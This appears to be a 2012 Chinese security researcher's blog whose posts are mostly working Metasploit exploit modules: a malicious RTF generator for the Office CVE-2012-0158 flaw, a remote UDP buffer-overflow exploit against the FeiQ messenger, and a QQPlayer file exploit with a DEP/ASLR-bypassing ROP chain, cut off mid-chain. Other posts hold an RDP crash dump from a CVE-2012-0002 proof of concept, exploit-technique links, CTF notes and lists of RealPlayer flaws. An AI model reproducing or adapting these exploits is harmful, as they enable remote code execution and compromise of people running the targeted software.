CQ-CSER

simple version of 2012-0158

cq — Wed, 02 May 2012 10:01:39 +0000

前些日子写的。精简版
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ##


require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote

	Rank = NormalRanking
	include Msf::Exploit::FILEFORMAT

	include Msf::Exploit::Seh
	def initialize(info = {})

		super(update_info(info,

			'Name'           => 'office cve-2012-0158 ',

			'Description'    => %q{

					CVE-2012-0158 office version

			},

			'License'        => MSF_LICENSE,

			'Author'         =>

				[

					'XX ', # Original Exploit

					'hellok', # MSF Module

				],

			'References'     =>

				[

					[ 'EDB',  ]

				],

			'DefaultOptions'  =>

				{

					'ExitFunction' => 'process',

					'InitialAutoRunScript' => 'migrate -f',

				},

			'Platform'       => 'win',

			'Payload'        =>

				{

				   #'Space'           => 200,

				   #'BadChars'        => "\x00\x0a\x0d\x1a\x80",

				   #'DisableNops'     => true,

				   #'StackAdjustment' => -3500,

				},
			'Targets'        =>

				[

					[ 'Windows XP',

						{

							'Ret'     => "\x2f\x49",

							'Offset'  => 4102,

							'Padding' => 1879

						}

					],

					[ 'Windows 7',

						{

							'Ret'     => "\x2f\x49",

							'Offset'  => 4102,

							'Padding' => 1931

						}

					],

				],

			'Privileged'     => false,

			'DisclosureDate' => '',

			'DefaultTarget'  => 0))
		register_options(

			[

				OptString.new('FILENAME', [ false, 'The file name.', 'msf.rtf']),

			], self.class)
	end
	def exploit
		head1="{\\rtf1

{\\object\\objocx

{\\*\\objdata

01050000020000001B0000004D53436F6D63746C4C69622E4C697374566965774374726C2E32000000000000000000000E0000

D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF0900060000000000000000000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFFFEFFFFFFFEFFFFFF0400000005000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500FFFFFFFFFFFFFFFF020000004BF0D1BD8B85D111B16A00C0F028362800000000ab9bDFB9340DCD018c49DFB9340DCD01030

00000000600000000000003004F0062006A0049006E0066006F0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000060000000000000003004F00430058004E0041004D004500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000FFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000001000000160000000000000043006F006E00740065006E007400730000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000200FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000020000007E05000000000000FEFFFFFFFEFFFFFF030000000400000005000000060000000700000008000000090000000A0000000B0000000C0000000D0000000E0000000F0000001000000011000000120000001300000014000000150000001600000017000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF009203000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004C0069007300740056006900650077004100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002143341208000000a50A0000050500004E087DEB010006001C000000000000000000000000060001560A000001EFCDAB00000500985D6501070000000800008005000080000000000000000000000000000000001FDEECBD010005009017190000000800000049746D7364

"

		head2="00000002000000010000000C000000436F626A640000004141000041410000000000000000000000000000"

		jmp_esp="1245fa7f"

		buffer="909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"

		head4="000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

}

}

}"

		print_status("buffer.length:#{buffer.length}")

		if payload.encoded.length >  buffer.length

			print_status("Shellcode too long")

		else

			payload_buf = ''

			payload_buf << payload.encoded

			escaped_payload = Rex::Text.to_hex(payload_buf, prefix = "", count = 1)#to_unescape to_hex_ascii to_unicode hex_to_raw to_hex_dump

			buffer[16,escaped_payload.length]=escaped_payload

			print_status("escaped_payload.length:#{escaped_payload.length}")

			head1<
			head1<
			head1<
			head1<
			file_create(head1)

		end

end end

feiq2008.2.5.0.0

cq — Sat, 07 Apr 2012 19:20:36 +0000

星期6的夜晚总是让人想到很多东西
调了下飞秋2.5.0.0测试版
可惜室友的64位WIN7没弹计算器。msf代码如下

下载地址
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ##


require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote

	#Rank definition: http://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking

	#ManualRanking/LowRanking/AverageRanking/NormalRanking/GoodRanking/GreatRanking/ExcellentRanking

	Rank = NormalRanking
	include Msf::Exploit::Remote::Udp

	include Msf::Exploit::Remote::Seh
	def initialize(info = {})

		super(update_info(info,

			'Name'		=> 'feiQ2.5 remote buffer overflow',

			'Description'	=> %q{

					Provide information about the vulnerability / explain as good as you can

					Make sure to keep each line less than 100 columns wide

					0049D04E  |.  F3:A5         rep movs dword ptr es:[edi],dword ptr ds:[esi]      ;

			},

			'License'		=> MSF_LICENSE,

			'Author'		=>

				[

					'insert_name_of_person_who_discovered_the_vulnerability',	# Original discovery

					'hellok',	# MSF Module

				],

			'References'	=>

				[

					[ 'OSVDB', '' ],

					[ 'CVE', 'insert CVE number here' ],

					[ 'URL', '' ]

				],

			'DefaultOptions' =>

				{

					'ExitFunction' => 'process', #none/process/thread/seh

					#'InitialAutoRunScript' => 'migrate -f',

				},

			'Platform'	=> 'win',

			'Payload'	=>

				{

					'BadChars' => "", # 

					'DisableNops' => true,

				},
			'Targets'		=>

				[

					[ 'WIN7',

						{

							'Ret'   	=>	0x0050511e,#{pivot 1484}  # POP EBX # MOV DWORD PTR FS:[0],ECX # ADD ESP,5C8 # RETN

							'Offset'	=>	0

						}

					],

				],

			'Privileged'	=> false,

			#Correct Date Format: "M D Y"

			#Month format: Jan,Feb,Mar,Apr,May,Jun,Jul,Aug,Sep,Oct,Nov,Dec

			'DisclosureDate'	=> 'MONTH DAY YEAR',

			'DefaultTarget'	=> 0))
		register_options([Opt::RPORT(2425)], self.class)
	end
	def exploit
		connect_udp
        print_status("Trying target #{target.name}...")
		header  = "1_lbt4_1#65664#6CF04987CC1A#570#31741#2147483648#2.5a:1317316152:admin:XXCCLI-A10D5C26:0:"

		jmp_esp = "\x12\x45\xfa\x7f" #0x7FFA4512 jmp esp

		padding="0"

		packet = "\x90"*7474

        packet[0,header.length] = header

		packet[408,8] = jmp_esp

		packet[408+8+8,payload.encoded.length] = payload.encoded

		packet << padding

		packet << [target.ret].pack("V") #SEH

		packet << [target.ret].pack("V") #SEH FUNC
		print_status("Trying target #{target.name}...")
		udp_sock.put(packet)
        handler

        disconnect_udp

end end

利用技术整理

cq — Tue, 20 Mar 2012 05:52:09 +0000

1.LINUX空指针引用
2.写00地址
//TODO

PDF:
数据流：
http://www.ccf.org.cn/sites/ccf/weekly/papers/王铁磊1.pdf

flash:

aslr bypass

http://zhodiac.hispahack.com/my-stuff/security/Flash_ASLR_bypass.pdf

http://kernelfun.blogspot.com/

http://browserfun.blogspot.com/

http://projects.info-pull.com/mokb/

http://www.abysssec.com/blog/2010/09/01/moaub-1/

2012-0002

cq — Wed, 14 Mar 2012 16:18:22 +0000

更新：
写一个可靠地POC真的很有挑战，有兴趣的周末有空可以试试

同时看到个PYTHON的POChere,什么叫“chinese shit”,那不是一个文明人应该说的话。

ANOTHER POC

Loading Dump File [C:\Windows\Minidump\031512-48641-01.dmp]
Mini Kernel Dump File: Only registers and stack trace are available

Symbol search path is: SRV*c:\sym*http://msdl.microsoft.com/download/symbols
Executable search path is:
Windows 7 Kernel Version 7600 MP (2 procs) Free x86 compatible
Product: WinNt, suite: TerminalServer SingleUserTS
Built by: 7600.16905.x86fre.win7_gdr.111025-1503
Machine Name:
Kernel base = 0×84813000 PsLoadedModuleList = 0x8495b810
Debug session time: Thu Mar 15 00:09:37.977 2012 (UTC + 8:00)
System Uptime: 0 days 4:51:31.285
Loading Kernel Symbols
………………………………………………………
……………………………………………………….
……………………………………………………….
……
Loading User Symbols
Loading unloaded module list
………
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************

Use !analyze -v to get detailed debugging information.

BugCheck 1000008E, {c0000005, 939a0987, b43d9804, 0}

*** WARNING: Unable to verify timestamp for Hookport.sys
*** ERROR: Module load completed but symbols could not be loaded for Hookport.sys
Probably caused by : termdd.sys ( termdd!IcaBufferAllocEx+1b )

Followup: MachineOwner
———

1: kd> k
ChildEBP RetAddr
b43d9884 a4a11232 termdd!IcaBufferAllocEx+0x1b
b43d98a4 a4a2b405 RDPWD!WDICART_IcaBufferAllocEx+0×24
b43d98c8 a4a2b46e RDPWD!StackBufferAllocEx+0x5c
b43d98f4 a4a1c722 RDPWD!MCSDetachUserRequest+0×29
b43d9908 a4a170ff RDPWD!NMDetachUserReq+0×14
b43d9914 a4a1666c RDPWD!NM_Disconnect+0×16
b43d9920 a4a1c821 RDPWD!SM_Disconnect+0×27
b43d9930 a4a1c762 RDPWD!SM_OnConnected+0×70
b43d9950 a4a174d3 RDPWD!NMAbortConnect+0×23
b43d9990 a4a16f3c RDPWD!NM_Connect+0×68
b43d99b0 a4a14f64 RDPWD!SM_Connect+0x11d
b43d99ec a4a15764 RDPWD!WDWConnect+0×557
b43d9a28 a4a108df RDPWD!WDLIB_TShareConfConnect+0xa0
b43d9a3c 939a45f1 RDPWD!WDSYS_Ioctl+0x6c9
b43d9a58 939a4aa9 termdd!_IcaCallSd+0×37
b43d9a78 939a4f68 termdd!_IcaCallStack+0×57
b43d9ac0 939a2e91 termdd!IcaDeviceControlStack+0×466
b43d9af0 939a3065 termdd!IcaDeviceControl+0×59
b43d9b08 8484f4bc termdd!IcaDispatch+0x13f
b43d9b20 84a5144e nt!IofCallDriver+0×63
b43d9b40 84a6e23f nt!IopSynchronousServiceTail+0x1f8
b43d9bdc 84a70a1a nt!IopXxxControlFile+0x6aa
b43d9c10 855d0e7d nt!NtDeviceIoControlFile+0x2a
WARNING: Stack unwind information not available. Following frames may be wrong.
b43d9d04 8485648a Hookport+0x4e7d
b43d9d04 775d6194 nt!KiFastCallEntry+0x12a
02f0e7e8 00000000 0x775d6194
1: kd> r
eax=0a0b05ff ebx=a431f8f0 ecx=00000151 edx=00640075 esi=0a0b05ff edi=d7abdb00
eip=939a0987 esp=b43d9878 ebp=b43d9884 iopl=0 nv up ei pl nz na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010206
termdd!IcaBufferAllocEx+0x1b:
939a0987 8b4618 mov eax,dword ptr [esi+18h] ds:0023:0a0b0617=????????
1: kd> !analyze -v
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************

KERNEL_MODE_EXCEPTION_NOT_HANDLED_M (1000008e)
This is a very common bugcheck. Usually the exception address pinpoints
the driver/function that caused the problem. Always note this address
as well as the link date of the driver/image that contains this address.
Some common problems are exception code 0×80000003. This means a hard
coded breakpoint or assertion was hit, but this system was booted
/NODEBUG. This is not supposed to happen as developers should never have
hardcoded breakpoints in retail code, but …
If this happens, make sure a debugger gets connected, and the
system is booted /DEBUG. This will let us see why this breakpoint is
happening.
Arguments:
Arg1: c0000005, The exception code that was not handled
Arg2: 939a0987, The address that the exception occurred at
Arg3: b43d9804, Trap Frame
Arg4: 00000000

Debugging Details:
——————

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 – 0x%08lx

FAULTING_IP:
termdd!IcaBufferAllocEx+1b
939a0987 8b4618 mov eax,dword ptr [esi+18h]

TRAP_FRAME: b43d9804 — (.trap 0xffffffffb43d9804)
ErrCode = 00000000
eax=0a0b05ff ebx=a431f8f0 ecx=00000151 edx=00640075 esi=0a0b05ff edi=d7abdb00
eip=939a0987 esp=b43d9878 ebp=b43d9884 iopl=0 nv up ei pl nz na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010206
termdd!IcaBufferAllocEx+0x1b:
939a0987 8b4618 mov eax,dword ptr [esi+18h] ds:0023:0a0b0617=????????
Resetting default scope

CUSTOMER_CRASH_COUNT: 1

DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT

BUGCHECK_STR: 0x8E

PROCESS_NAME: svchost.exe

CURRENT_IRQL: 0

LAST_CONTROL_TRANSFER: from a4a11232 to 939a0987

STACK_TEXT:
b43d9884 a4a11232 d7abdb00 00000000 00d800b1 termdd!IcaBufferAllocEx+0x1b
b43d98a4 a4a2b405 d7abdb00 00000000 00d800b1 RDPWD!WDICART_IcaBufferAllocEx+0×24
b43d98c8 a4a2b46e b7a30c88 d7abdb00 00000000 RDPWD!StackBufferAllocEx+0x5c
b43d98f4 a4a1c722 c1edd270 00000010 a431f604 RDPWD!MCSDetachUserRequest+0×29
b43d9908 a4a170ff a431f8f0 b43d9920 a4a1666c RDPWD!NMDetachUserReq+0×14
b43d9914 a4a1666c a431f8f0 b43d9930 a4a1c821 RDPWD!NM_Disconnect+0×16
b43d9920 a4a1c821 a431f604 a431f8f0 b43d9950 RDPWD!SM_Disconnect+0×27
b43d9930 a4a1c762 a431f604 00000000 00000001 RDPWD!SM_OnConnected+0×70
b43d9950 a4a174d3 a431f8f0 00000002 a431f604 RDPWD!NMAbortConnect+0×23
b43d9990 a4a16f3c 0031f8f0 00000001 a431f3fe RDPWD!NM_Connect+0×68
b43d99b0 a4a14f64 a431f604 89e8cdc0 89e8cdcc RDPWD!SM_Connect+0x11d
b43d99ec a4a15764 a431f008 89e8ccdc 89e8cdc0 RDPWD!WDWConnect+0×557
b43d9a28 a4a108df a431f008 00000000 87a11260 RDPWD!WDLIB_TShareConfConnect+0xa0
b43d9a3c 939a45f1 a431f008 b43d9a98 8a6f0678 RDPWD!WDSYS_Ioctl+0x6c9
b43d9a58 939a4aa9 87a11260 00000005 b43d9a98 termdd!_IcaCallSd+0×37
b43d9a78 939a4f68 8a6f0670 00000005 b43d9a98 termdd!_IcaCallStack+0×57
b43d9ac0 939a2e91 8a6f0670 86eb0798 86eb0808 termdd!IcaDeviceControlStack+0×466
b43d9af0 939a3065 86eb0798 86eb0808 87a4a038 termdd!IcaDeviceControl+0×59
b43d9b08 8484f4bc 87fe48f8 86eb0798 86eb0798 termdd!IcaDispatch+0x13f
b43d9b20 84a5144e 87a4a038 86eb0798 86eb0808 nt!IofCallDriver+0×63
b43d9b40 84a6e23f 87fe48f8 87a4a038 00000000 nt!IopSynchronousServiceTail+0x1f8
b43d9bdc 84a70a1a 87fe48f8 86eb0798 00000000 nt!IopXxxControlFile+0x6aa
b43d9c10 855d0e7d 00000754 00000000 00000000 nt!NtDeviceIoControlFile+0x2a
WARNING: Stack unwind information not available. Following frames may be wrong.
b43d9d04 8485648a 00000754 00000000 00000000 Hookport+0x4e7d
b43d9d04 775d6194 00000754 00000000 00000000 nt!KiFastCallEntry+0x12a
02f0e7e8 00000000 00000000 00000000 00000000 0x775d6194

STACK_COMMAND: kb

FOLLOWUP_IP:
termdd!IcaBufferAllocEx+1b
939a0987 8b4618 mov eax,dword ptr [esi+18h]

SYMBOL_STACK_INDEX: 0

SYMBOL_NAME: termdd!IcaBufferAllocEx+1b

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: termdd

IMAGE_NAME: termdd.sys

DEBUG_FLR_IMAGE_TIMESTAMP: 4a5bcadf

FAILURE_BUCKET_ID: 0x8E_termdd!IcaBufferAllocEx+1b

BUCKET_ID: 0x8E_termdd!IcaBufferAllocEx+1b

Followup: MachineOwner
———

FUNNY POSTS

cq — Fri, 02 Mar 2012 09:03:01 +0000

http://gdtr.wordpress.com/2012/02/22/exploiting-cve-2011-2371-without-non-aslr-modules/

https://www.corelan.be/index.php/2012/02/29/debugging-fun-putting-a-process-to-sleep/

内存补丁

http://ifsec.blogspot.com/2011/06/memory-disclosure-technique-for.html

信息泄露，基质查找技术

通过覆盖JAVASRIPT内存结构的长度，完成读取不应该读取的内存

http://leetmore.ctf.su/CODEGATE2012

BIN500 2层VM解码+PYTHON解码。其实只用带一个就OK。。作者小粗心了下。。

BIN400 好怀念，，此处为暴力模拟键盘，autohotkey script,nice！

BIN300就是UNPACK+分析+识别

for500 又见trid,参见mark0.net/soft-trid-e.html

最近觉得BIN什么的也蛮好玩啦，VUL出题的话太难了。

No related posts.

2012

cq — Sun, 15 Jan 2012 08:17:54 +0000

新年快到了，昨天到家了，整理下最近买的，强的，别人送的

各种怀念啊！

新年要有新计划，还是写下来约束力大点。

1.OS,BROWSER,MUTIL PLAYER 3个重点方向要有成果

2.完善理论，开发自用工具，向大虾学习。

3.忘记一些东东，稳定下来，培养新习惯。

4.实践新技术方向

WAR3格式

cq — Mon, 12 Dec 2011 09:13:46 +0000

本来是考虑w3g格式的
参见如下

http://w3g.deepnode.de/files/w3g_format.txt

大致包含部分：
版本头
压缩数据

解压出来包含各类时间，动作等。用的是ZLIB解压
/////////////////////////////////////////////////////////////////////////////////////////////////////
后来想了下，用录像不如用地图，随便打开一个

00000000h: 48 4D 33 57 00 00 00 00 E5 8F AA E6 98 AF E5 8F ; HM3W….鍙槸鍙

00000010h: A6 E5 A4 96 E4 B8 80 E5 BC A0 E9 AD 94 E5 85 BD ; ﹀涓€寮犻瓟鍏?

00000020h: E4 BA 89 E9 9C B8 49 49 49 E7 9A 84 E5 9C B0 E5 ; 浜夐湼III鐨勫湴?

00000030h: 9B BE 00 14 9C 00 00 01 00 00 00 00 00 00 00 00 ; 浘..?……….

00000040h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; …………….

00000200h: 4D 50 51 1A 20 00 00 00 12 34 56 78 11 11 11 11 ; MPQ. ….4Vx….

00000210h: A1 38 00 00 A1 3C 00 00 40 00 00 00 10 00 00 00 ; ?..?..@…….

00000220h: 24 00 00 00 8D 02 00 00 BF 04 00 00 FE 06 00 00 ; $…?..?..?..

00000230h: 25 09 00 00 54 0B 00 00 85 0D 00 00 93 0F 00 00 ; %…T…?..?..

猜测下包含文件头和MPQ2部分，我们随便修改下MPQ后面的数字，如上，1234567811111111，用WAR3打开，果然CRASH了哈，一次是内存不够，一次是异常。大胆猜测，直接读取值开辟空间？

WAR3应该是VC6的老编译器的吧。作为一个忠实真三DOTA爱好者，唉

////////////////////////////////////////////////////////////

再来看最近的几个scada的，不管是溢出还是use-after-free，某人的入手点很好啊，从注册类型PROJECT文件处理入手。

////////////////////////////////////////////////////////////

另，REALPLAYER一次补了好多洞啊

REALPLAYER QCP,AAC,MP3,SWF，RealAudio sipr 漏洞

CVE-2011-2945

RealPlayer SIPR Heap Buffer Overflow Vulnerability （out of bound）http://wiki.multimedia.cx/index.php?title=RealAudio_sipr

CVE-2011-2946

RealPlayer ActiveX Remote Code Execution Vulnerability

CVE-2011-2947

RealPlayer Cross-Zone Scripting Remote Code Execution Vulnerability

CVE-2011-2952

RealPlayer Dialog Box Use After Free Vulnerability

CVE-2011-2953

RealPlayer ActiveX Browser Plugin Out of Bounds Vulnerability.

CVE-2011-2954

RealPlayer Embedded AutoUpdate Use After Free Vulnerability

CVE-2011-2955

RealPlayer Embedded Modal Dialog Use After Free Vulnerability

CVE-2011-1221

RealPlayer Cross-Zone Scripting Remote Code Execution Vulnerability

No related posts.

QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS

cq — Mon, 21 Nov 2011 08:26:22 +0000

http://cq-cser.cn/wp-content/plugins/downloads-manager/upload/qqplayer.rb
样本：

http://115.com/file/cl3naedv

http://115.com/file/aqu3qzmk

# Exploit Title: QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS # Date: 2011,11,21 # Author: hellok(warptencq[at]gmail.com) # Software Link: http://dl_dir.qq.com/invc/qqplayer/QQPlayer_Setup_32_845.exe # Version: 32_845(lastest) # Tested on: WIN7 require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::FILEFORMAT


	def initialize(info = {})

		super(update_info(info,

			'Name'           => 'QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS',

			'Description'    => %q{

					This module exploits a vulnerability in QQPLAYER Player 3.2.

				When opening a .mov file containing a specially crafted PnSize value, an attacker

				may be able to execute arbitrary code.

			},

			'License'        => MSF_LICENSE,

			'Author'         =>

				[

					'hellok',  #special thank corelanc0d3r for 'mona'

				],

			'References'     =>

				[

				],

			'DefaultOptions' =>

				{

					'EXITFUNC' => 'process',

					'DisablePayloadHandler' => 'true',

				},

			'Payload'        =>

				{

					'Space'          => 750,

					'BadChars'       => "",  #Memcpy

					'EncoderType'    => Msf::Encoder::Type::AlphanumUpper,

					'DisableNops'    =>  'True',

					'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",

					'EncoderOptions' =>

						{

							'BufferRegister' => 'ECX',

						},

				},

			'Platform' => 'win',

			'Targets'        =>

				[

					[ 'Windows 7', { 'Ret' => 0x67664cde } ],

				],

			'Privileged'     => false,

			'DisclosureDate' => '11 21 2011',

			'DefaultTarget'  => 0))
		register_options(

			[

				OptString.new('FILENAME',   [ false, 'The file name.',  'msf.mov' ]),

			], self.class)

	end

	def exploit

		# !mona rop

		rop_gadgets =

		[
			0x00418007,	# POP ECX # RETN (QQPlayer.exe)

			0x12345678,

			0x67664CE4,

			0x01020304,

			0x10203040,

			0x22331122,

			0x23456789,
			0x00418007,	# POP ECX # RETN (QQPlayer.exe)

			0x00a9c18c,	# <- *&VirtualProtect()

			0x0054f100,	# MOV EAX,DWORD PTR DS:[ECX] # RETN (QQPlayer.exe)

			#0x008e750c, LEA ESI,EAX # RETN (QQPlayer.exe)

			0x008cf099,	# XCHG EAX,ESI # RETN
			0x6497aaad,	# POP EBP # RETN (avformat-52.dll)

			0x100272bf,	# ptr to 'call esp' (from i18nu.dll)

			0x005fc00b,	# POP EBX # RETN (QQPlayer.exe)

			0x00000331,	# <- change size to mark as executable if needed (-> ebx)

